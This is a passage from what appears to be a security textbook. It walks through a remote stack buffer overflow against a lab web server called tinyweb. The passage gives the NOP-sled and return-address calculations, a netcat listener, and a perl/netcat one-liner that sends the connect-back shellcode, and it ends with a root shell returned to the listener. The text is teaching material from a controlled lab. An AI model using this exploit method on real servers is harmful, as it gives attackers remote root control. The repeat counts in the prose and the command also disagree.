Shellcode 317the return address uses multiple bytes. To ensure proper alignment, the sum
of the NOP sled and shellcode bytes must be divisible by four. In addition, the
shellcode itself must stay within the first 500 bytes of the overwrite. These are
the bounds of the response buffer, and the memory afterward corresponds
to other values on the stack that might be written to before we change the
program’s control flow. Staying within these bounds avoids the risk of random
overwrites to the shellcode, which inevitably lead to crashes. Repeating the
return address 16 times will generate 64 bytes, which can be put at the end of
the 544-byte exploit buffer and keeps the shellcode safely within the bounds
of the buffer. The remaining bytes at the beginning of the exploit buffer will
be the NOP sled. The calculations above show that a 402-byte NOP sled will
properly align the 78-byte shellcode and place it safely within the bounds of
the buffer. Repeating the desired return address 12 times spaces the final
4 bytes of the exploit buffer perfectly to overwrite the saved return address
on the stack. Overwriting the return address with 0xbffff688 should return
execution right to the middle of the NOP sled, while avoiding bytes near the
beginning of the buffer, which might get mangled. These calculated values
will be used in the following exploit, but first the connect-back shell needs
some place to connect back to. In the output below, netcat is used to listen
for incoming connections on port 31337.
reader@hacking:~/booksrc $ nc -v -l -p 31337
listening on [any] 31337 ...
Now, in another terminal, the calculated exploit values can be used to
exploit the tinyweb program remotely.
From Another Terminal Window
reader@hacking:~/booksrc $ (perl -e 'print "\x90"x402';
cat connectback_shell;
perl -e 'print "\x88\xf6\xff\xbf"x20. "\r\n"') | nc -v 127.0.0.1 80
localhost [127.0.0.1] 80 (www) open
Back in the original terminal, the shellcode has connected back to
the netcat process listening on port 31337. This provides root shell access
remotely.
reader@hacking:~/booksrc $ nc -v -l -p 31337
listening on [any] 31337 ...
connect to [192.168.42.72] from hacking.local [192.168.42.72] 34391
whoami
root
The network configuration for this example is slightly confusing
because the attack is directed at 127.0.0.1 and the shellcode connects back
to 192.168.42.72. Both of these IP addresses route to the same place, but
192.168.42.72 is easier to use in shellcode than 127.0.0.1. Since the loopback
address contains two null bytes, the address must be built on the stack with